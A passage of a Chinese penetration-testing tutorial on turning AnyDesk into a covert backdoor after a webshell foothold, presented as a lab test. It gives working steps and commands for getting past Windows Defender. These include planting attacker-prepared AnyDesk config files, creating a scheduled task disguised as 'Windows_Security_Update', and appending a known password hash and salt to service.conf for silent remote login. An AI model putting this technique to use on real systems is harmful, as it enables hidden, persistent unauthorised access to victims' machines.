而通常这个时候我们有权限修改anydesk的配置文件，这里进行测试，起两个虚拟机，设定一个场景（攻击机拿到了webshell，受害机开着windows defender，如何去渗透拿到受害机权限）

情景复现

这里拿到了受害机的webshell，是个普通权限，无法去关闭

.这里可以看到有windows defender来运行，这里无法进行关闭windows defender，

这里用powershell来执行远程命令下载anydesk到用户的目录中去,因为虚拟机只有C盘，所以我创建了一个目录来进行存放，在真实的渗透过程中，一般是有RWE的目录

上传上去之后，先不去打开。转到攻击机进行操作

（1）这里先去给攻击机下载anydesk（如果下载过的小伙伴，要先清除） C:\Users\用户名\AppData\Roaming\AnyDesk中的配置，没有的就不用看这一步，清除结束后如下

（2）这里打开攻击机的anydesk，牢记我此处勾选的id，然后点击右上角的概述-->为自主访问设置密码-->设置一个密码（这里设置为Q16G666!!）--->之后点击应用，攻击机完全退出anydesk（小托盘也要退出），并且退出时不选择安装anydesk

（3）攻击机完全退出anydesk（小托盘也要退出），这里还是到配置文件下 C:\Users\用户名\AppData\Roaming\AnyDesk，然后把文件复制下来。是我图中勾选的这四个。复制完成之后，攻击机将文件进行删除。

复制下来之后，给受害机的当前用户（拿到权限的用户）找到anydesk配置文件路径并且复制到其他（如果没有配置文件路径则进行创建配置文件路径），一定要注意这里攻击机复制完之后，一定要将攻击机中的配置文件进行删除

（4）重新打开攻击机，生成配置文件，启动受害机的anydesk。

（5）用攻击机进行连接，这里连接的id就是（2）中截图的id，密码就是（2）中设置的密码即可成功无感绕过windows defender

情景复现2 （计划任务）

（1）确定用户创建计划任务

如果命令行不能去执行，则可以去创建计划任务去执行，例如，必须先确定当前用户，在当前用户的目录下执行anydesk

powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]

schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU 用户名

执行计划任务
schtasks /run /tn Windows_Security_Update

后续步骤和上面相同

 然后添加密码到配置文件中去（密码为AnyDeskGetAccess）

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf

然后查看用户的id

连接即可

优点：

整个过程都不需要进行UAC弹窗，真正实现了无感绕过

缺点：

（1）会弹出anydesk的界面，导致一些问题

（2）启动anydesk的权限需要桌面用户权限，比如，IIS做了中间件环境，拿到的webshell一般都是没有桌面用户权限，如果启动anydesk是不会成功的。